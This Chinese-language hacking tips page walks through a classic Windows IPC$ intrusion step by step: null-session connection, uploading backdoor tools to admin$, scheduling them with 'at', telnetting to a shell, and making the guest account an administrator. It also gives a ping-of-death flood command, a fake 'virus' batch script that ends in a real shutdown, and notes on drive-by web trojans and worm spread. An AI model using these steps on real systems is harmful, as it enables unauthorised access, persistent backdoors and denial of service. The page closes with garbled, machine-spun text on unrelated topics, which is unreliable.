一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的网络命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
给你个最简单的,让对方内存供不应求,使其瘫痪。代码如下:
ping -l 65500 目标ip -t
这么简单?被吓着了吧?这叫“死亡之ping",人家电脑按了补丁就不行了。至于其他复杂的,你还是别多问了,不作死就不会死,具体请看我(被朋友报复整死了)
无限命令行弹窗类的伪装黑客代码可以按ctrl+alt+del打开任务管理器,当然也可以右击任务栏打开任务管理器杀程序,或者可以在开始菜单中点注销,这时候由于开了太多进程(弹窗),系统要一个一个杀完才能关机,等到杀得差不多的时候,点击取消就好了
首先浏览者的电脑必须有漏洞,如果打上系统补丁那就没辙了,这段代码主要是利用特定的漏洞来让浏览器在后台下载并运行指定文件,含有这样代码的网页被称为网页木马,简称网马,很多被挂了网马的网站只是被插入了一段弹出网页代码,这段代码会让浏览器弹出一个长宽为0的页面,实际上就是一个看不见的页面,而这个页面实际上就是我上面说说的网马页面,不过只要你打上全系统补丁就可以不必在乎网马。我们常见的视频木马也是这个道理。
@echo
off
color
0b
mode
con:
cols=80
lines=20
@title=超级病毒
for
/L
%%a
in
(
3,-1,0
)
do
(
for
/l
%%a
in
(1,1,8)
do
echo\
echo
入侵倒计时
%%a
秒
ping
-n
2
127.1
1nul
2nul
cls
)
cls
color
40
for
/l
%%a
in
(1,1,8)
do
echo\
echo
正在遭受黑客入侵...
ping
127.1
/n
3
nul
echo.
echo
警告!警告!电脑已被入侵!!!
ping
127.1
/n
3
nul
cls
echo.
echo.
echo.
echo
正在删除G盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除E盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除D盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除C盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除分区表...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo.
echo
删除完毕
echo.
echo.
echo
正在遭受黑客的炸弹袭击!
echo.
echo
电脑崩溃!准备关闭系统!
ping
127.1
/n
3
nul
shutdown
-s
-t
nulp
/p
1.蠕虫病毒,运行后,将自己复制到%SYSTEM%目录下,文件名为“CRACK_BAT.EXE”、“SYSTEMS.EXE”、“IQ.DAT”、“FTTP.EXE”“AUTO.EXE”等。
2.修改系统文件“system.ini”,在其中的[boot]节的shell里加入自己“systems.exe”,实现开机自启动。
3.下载木马,病毒
4.扫描局域望网,互联网漏洞大规模感染传播.U盘也是一种重要的传播途径.
教卒业 注册 手表自我判断 手表,是处理 本身 教四年的空面,尝试 ,现实,创新 ,晋升 业余知识 结构 不断...
许多 人应该有自愿 的经验 ,更紧的应该是作为一个图书馆 自愿 。自愿 运动 是一种通知 爱和传播 文化的风格...
,许多 人自己做 的自我判断 。作为新时期 的熟悉度, 将离开 外籍教师时期 的酸、苦、甜、辣,也将进入高端...
给予指导 的感激 怀疑如何写模式 以下:在第一个停止的中心 用一点字体写感激 怀疑这个词。如果 你给或 写了一...
党员应该怎么写进修 口吃?昨天,我给了年夜 野整顿 几个党员进修 口吃了解 ,供参考。领会 口患?一一个通过...
上思节的习俗上思节,雅称三月三,是汉族的传统节日。汉汉族的传统节日。汉朝以前定为3月3日,后来定为农历 3月3...